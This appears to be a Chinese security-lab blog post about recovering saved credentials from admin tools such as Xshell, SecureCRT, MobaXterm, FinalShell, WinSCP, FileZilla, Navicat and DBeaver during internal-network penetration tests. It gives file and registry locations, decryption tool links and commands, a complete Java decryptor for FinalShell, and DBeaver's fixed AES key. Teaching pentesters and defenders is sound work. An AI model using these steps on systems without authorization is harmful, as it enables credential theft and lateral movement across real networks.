戟星安全实验室
本文约5792字,阅读约需15分钟。
0x00 前言
0x01 网络传输协议工具类
先找到xshell保存密码的位置,点打开会话文件夹
其中.xsh里面就是保存的链接信息包括账户密码
前提是登录的时候必须勾选了记住账户和密码
离线解密工具下载:
https://github.com/HyperSine/how-does-Xmanager-encrypt-password
python XShellCryptoHelper.py -d -key 123123 zvHVi7hm/Nsk6y2BGNVpTNSvXlPRN+/1P+aQKhFF5XJ3l2
123132为主控密码在文件导出的时候设置 后面为.xsh文件中的password字段类容
另一种解法 未设置主控密码
python XShellCryptoHelper.py -d -user aaaa -sid S-1-5-21-4217108860-1001 zvHVi7hm/Nsk6y2BGNVpTNSvXlPRN+/1P+aQKhFF5XJ3l2
whoami /user 查看user和sid
使用在线工具
https://github.com/uknowsec/SharpDecryptPwd
该工具只支持在线解密的方式,就是必须要将工具放到目标机器上运行。
xftp一样的
-
SecureCRT
SecureCRT和xshell一样,很多运维人员会将SSH的账号密码保存在上面。
前提时管理员登录时勾选了记住密码
SecureCRT密码密码存放位置
C:UsersonesevenAppDataRoamingVanDykeConfigSessions
打开后 密码是加密的 我们需要对其进行解密
SecureCRT 离线解密工具:
https://github.com/HyperSine/how-does-SecureCRT-encrypt-password
python SecureCRTCipher.py dec -v2 <密码>
-
MobaXterm
MobaXterm是一款远程终端控制软件,集串口,SSH远程登录和FTP传输三合一的工具,便携版操作简单,使用非常方便。
连接过后会在当前目录生成一个.ini文件
其中就储存着我们登录的账户密码
离线工具下载:
https://github.com/HyperSine/how-does-MobaXterm-encrypt-password使用命令
python MobaXtermCipher.py dec -sp <ini文件中的SessionP> <加密的Passwords>
-
finalshell
FinalShell是一体化的的服务器,网络管理软件,不仅是ssh客户端,还是功能强大的开发,运维工具,充分满足开发,运维需求
连接信息存储在C:UsersonesevenAppDataLocalfinalshellconn目录下 有多少条连接就会有多少个xxx_connect_config.json文件
用户登录时必须勾选记住密码,否则不会在xxx_connect_config.json文件中保存密码
离线解密:别人已经写好了的java代码
FinalShellDecodePass.java
import java.io.ByteArrayOutputStream;import java.io.DataOutputStream;import java.io.IOException;import java.math.BigInteger;import java.security.MessageDigest;import java.security.NoSuchAlgorithmException;import java.security.SecureRandom;import java.util.Base64;import java.util.Random;import javax.crypto.Cipher;import javax.crypto.SecretKey;import javax.crypto.SecretKeyFactory;import javax.crypto.spec.DESKeySpec;public class FinalShellDecodePass {public static void main(String[] args)throws Exception {System.out.println(decodePass(args[0]));}public static byte[] desDecode(byte[] data, byte[] head) throws Exception {SecureRandom sr = new SecureRandom();DESKeySpec dks = new DESKeySpec(head);SecretKeyFactory keyFactory = SecretKeyFactory.getInstance("DES");SecretKey securekey = keyFactory.generateSecret(dks);Cipher cipher = Cipher.getInstance("DES");cipher.init(2, securekey, sr);return cipher.doFinal(data);}public static String decodePass(String data) throws Exception {if (data == null) {return null;} else {String rs = "";byte[] buf = Base64.getDecoder().decode(data);byte[] head = new byte[8];System.arraycopy(buf, 0, head, 0, head.length);byte[] d = new byte[buf.length - head.length];System.arraycopy(buf, head.length, d, 0, d.length);byte[] bt = desDecode(d, ranDomKey(head));rs = new String(bt);return rs;}}static byte[] ranDomKey(byte[] head) {long ks = 3680984568597093857L / (long)(new Random((long)head[5])).nextInt(127);Random random = new Random(ks);int t = head[0];for(int i = 0; i < t; ++i) {random.nextLong();}long n = random.nextLong();Random r2 = new Random(n);long[] ld = new long[]{(long)head[4], r2.nextLong(), (long)head[7], (long)head[3], r2.nextLong(), (long)head[1], random.nextLong(), (long)head[2]};ByteArrayOutputStream bos = new ByteArrayOutputStream();DataOutputStream dos = new DataOutputStream(bos);long[] var15 = ld;int var14 = ld.length;for(int var13 = 0; var13 < var14; ++var13) {long l = var15[var13];try {dos.writeLong(l);} catch (IOException var18) {var18.printStackTrace();}}try {dos.close();} catch (IOException var17) {var17.printStackTrace();}byte[] keyData = bos.toByteArray();keyData = md5(keyData);return keyData;}public static byte[] md5(byte[] data) {String ret = null;byte[] res=null;try {MessageDigest m;m = MessageDigest.getInstance("MD5");m.update(data, 0, data.length);res=m.digest();ret = new BigInteger(1, res).toString(16);} catch (NoSuchAlgorithmException e) {e.printStackTrace();}return res;}}
先进行编译
javac FinalShellDecodePass.java在运行
java FinalShellDecodePass <password>其中password就是xxx_connect_config.json文件中的password字段类容
-
Winscp
一个 Windows 环境下使用的SSH 的开源图形化 SFTP 客户端
解密
密码是保存在注册表中
reg query "HKEY_CURRENT_USERSoftwareMartinPrikrylWinSCP 2Sessions”
可以看到链接名称,但需要建站点时保存密码
离线工具
https://github.com/anoopengineer/winscppasswd
使用命令
winscppasswd.exe <主机> <用户名> <加密密码>
使用在线工具SharpDecryptPwd可直接获取密码
-
FileZilla
一款FTP操作类的软件
首先导出记录
导出后是一个xml文件 打开后base64就是密码 直接解密就行
使用在线工具SharpDecryptPwd
0x02 数据库
-
Navicat
Navicat是一套可创建多个连接的数据库管理工具,用以方便管理 MySQL、Oracle、PostgreSQL、SQLite、SQL Server、MariaDB和/或 MongoDB 等不同类型的数据库,并支持管理某些云数据库,例如阿里云、腾讯云。
连接信息是存在注册表里面
|
数据库 |
注册表位置 |
|
MySQL |
HKEY_CURRENT_USERSoftwarePremiumSoftNavicatServers<your connection name> |
|
MariaDB |
HKEY_CURRENT_USERSoftwarePremiumSoftNavicatMARIADBServers<your connection name> |
|
MicrosoftSQL |
HKEY_CURRENT_USERSoftwarePremiumSoftNavicatMSSQLServers<your connection name> |
|
Oracle |
HKEY_CURRENT_USERSoftwarePremiumSoftNavicatOraServers<your connection name> |
|
PostgreSQL |
HKEY_CURRENT_USERSoftwarePremiumSoftNavicatPGServers<your connection name> |
|
SQLite |
HKEY_CURRENT_USERSoftwarePremiumSoftNavicatSQLiteServers<your connection name> |
|
MongoDB |
HKEY_CURRENT_USERSoftwarePremiumSoftNavicatMONGODBServers<your connection name> |
这里就只测下用mysql举例子, 其他都一样
离线工具:
https://github.com/HyperSine/how-does-navicat-encrypt-password/tree/master/python3我们需要的是注册表中的Pwd字段的类容
python NavicatCipher.py dec 5658213B
使用在线工具SharpDecryptPwd进行解密
-
DBeaver
dbeaver是免费和开源(GPL)为开发人员和数据库管理员通用数据库工具。易用性是该项目的主要目标,是经过精心设计和开发的数据库管理工具。
连接时勾选保存密码到本地
C:UsersonesevenAppDataRoamingDBeaverDataworkspace6General.dbeaver目录里.json文件中存放着数据库的连接信息和密码,credentials-config.json里是密码但做了加密
离线解密:使用openssl解密,将credentials-config.json文件放入当前目录
openssl aes-128-cbc -d -K babb4a9f774ab853c96c2d653dfe544a -iv 00000000000000000000000000000000 -in credentials-config.json | dd bs=1 skip=16
0x03 总结
后续会更新远程工具和浏览器的密码获取方式。
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,戟星安全实验室及文章作者不为此承担任何责任。
戟星安全实验室拥有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经戟星安全实验室允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。
戟星安全实验室
# 长按二维码 关注我们 #
原文始发于微信公众号(戟星安全实验室):强烈推荐,内网常用工具密码获取(上)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论